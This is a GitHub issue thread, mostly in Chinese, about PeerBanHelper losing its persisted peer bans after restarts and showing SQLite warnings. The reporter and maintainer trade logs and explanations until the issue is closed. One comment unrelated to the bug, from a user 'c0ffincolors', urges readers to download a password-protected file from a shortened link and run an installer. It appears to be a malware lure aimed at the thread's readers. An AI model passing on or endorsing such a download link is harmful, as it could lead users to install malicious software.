### ISSUE TITLE
[BUG] 封禁Peer丢失

### ISSUE THREAD

**Issue by lingfengyu-dreaming** [PBH-BTN/PeerBanHelper#401]
### 版本号 - Version

v6.0.3-v6.0.4

### 操作系统平台和系统架构 - OS  and CPU Arch

Windows 11 x64

### 部署方式 - Deploy method

Windows 安装程序（EXE）

### 关联的下载器类型 - Downloader Type

qBittorrent

### 问题描述 - Issue Description

在6.0.3版本出现了封禁peer丢失的问题，当时是在控制台输出中发现的问题，在一次系统重启前还有20个封禁，重启后就没有了，并且时不时还出现SQLite的死锁警告，严重的时候还出现了数据库的报错（类型忘记了）

### 复现步骤 - Reproduce steps

在第一次出现的时候是系统进行了一次普通重启，在重启界面无PBH显示，PBH未阻止重启。重启后启动PBH发现当前的封禁数变为0。此后几天PBH未出现新封禁。
第二次出现是更新到6.0.4后重启PBH。这时我在日志里看见有一个新增封禁，而目前保存0封禁数到数据库。

### 截图/日志文件 - Screenshot / Logs 

![Clip_2024-08-28_00-08-56](https://github.com/user-attachments/assets/5956e81d-73c8-4e78-ace9-9fa9b21a3e43)
![Clip_2024-08-28_00-09-08](https://github.com/user-attachments/assets/fadc4b9a-7485-4136-9ea0-ea66a26bd037)
![Clip_2024-08-28_00-09-39](https://github.com/user-attachments/assets/32bb495a-16c8-4c5a-a700-e152d98a3841)

### 额外信息 - Addition Information

开启了配置文件中的主动监测配置。此设置所有数值保持默认。
开启配置文件中持久保持封禁列表。此设置所有数值保持默认。
禁用了检查x个peer日志输出。
其他设置均通过webui设置。

### 检查清单 - Check list

- [X] 我确定正在运行 Github Releases 中的最新的正式版本 PeerBanHelper (I'm running the latest version of PBH that can be found in Github Relases)
- [X] 我确定我所添加的下载器已满足 README 中的前置要求（如版本号和插件）(The downloaders that I've added already satisfied the requirements (E.g install plugins/adapters))
- [X] 我确定我所提到的问题，均未在 README 和 WIKI 中有所解答 (This not a question/or the question that not listed in README's FAQ or WIKI)
- [ ] 我确定我没有检查这个检查清单，只是闭眼选中了所有的复选框 (I have not read these checkboxes and therefore I just ticked them all)
- [X] 我确定这不是一个与安全有关的安全漏洞，它可以被安全的公开报告 (This not a security related issue, can be safe report in public)
- [X] 我确定我已知悉，如果我没有正确地填写问题报告表单，则 Issue 可能会被关闭 (I know this issue may closed without any warnings if I didn't fill the form correctly)

**Comment by Ghost-chu** [comment]
请上传出错时的日志信息

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by lingfengyu-dreaming** [comment]
已经没有直接报错的日志，这是所有日志打包。其中含有一个不明报错文件。
[log.zip](https://github.com/user-attachments/files/16765982/log.zip)
这次更新后启动只有一个数据库警告，关闭了检查peerid的输出之后也没有封禁peer的输出。我挂一晚看看会不会有封禁。

**Comment by lingfengyu-dreaming** [comment]
[output.log](https://github.com/user-attachments/files/16766086/output.log)（输出2）
[output - 复制.log](https://github.com/user-attachments/files/16766087/output.-.log)（输出1）
添加了新出的种子当即就有封禁，发现问题没有复现，问题可能就是出现在6.0.3版本，6.0.4的首次启动就是恢复0封禁了。
目前存在的问题大约仅剩数据库的警告。

**Comment by Ghost-chu** [comment]
版本升级可能会有封禁列表数据升级操作，如果封禁列表数据结构跨版本不兼容，就会被清空。由于封禁列表并非重要数据，通常不会写它的升级脚本。

**Comment by lingfengyu-dreaming** [comment]
在6.0.3版本产生的所有封禁数据都没有保存，即使是在同一个版本内也没有保存，可能就是一个版本的问题

**Comment by lingfengyu-dreaming** [comment]
过了一晚上封禁日志有些不一样了，出现报错了，我发上来看看
[output.log](https://github.com/user-attachments/files/16774879/output.log)
这是下载器设置
![Clip_2024-08-28_10-03-32](https://github.com/user-attachments/assets/3d92df81-dba3-47fc-8fb4-7ad8b16e550d)

**Comment by Ghost-chu** [comment]
> 过了一晚上封禁日志有些不一样了，出现报错了，我发上来看看 [output.log](https://github.com/user-attachments/files/16774879/output.log) 这是下载器设置 ![Clip_2024-08-28_10-03-32](https://private-user-images.githubusercontent.com/61617417/362093704-3d92df81-dba3-47fc-8fb4-7ad8b16e550d.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ4MjUxNjEsIm5iZiI6MTcyNDgyNDg2MSwicGF0aCI6Ii82MTYxNzQxNy8zNjIwOTM3MDQtM2Q5MmRmODEtZGJhMy00N2ZjLThmYjQtN2FkOGIxNmU1NTBkLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjglMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI4VDA2MDEwMVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTFmYzkzZDVmZmMzMTJkN2VmODczYWQwNzlkMTE4MzFkZTUzY2U5NjlmZDc4YjFlNDU5YTZjNGRjZTNhOTg1YjAmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.Rs2D1uOd1BMFjjhcmW8YIwqOcH_vv8ZQyFTGvIkfvmc)

从日志来看，只是因为系统休眠了，导致唤醒的时候时钟跳变，PBH以为自己卡死了所以重启了一部分功能模块，打印了调试信息。没啥大问题

**Comment by lingfengyu-dreaming** [comment]
未发现更多问题，就题目所反馈的问题而言已经没有更多内容，关闭反馈
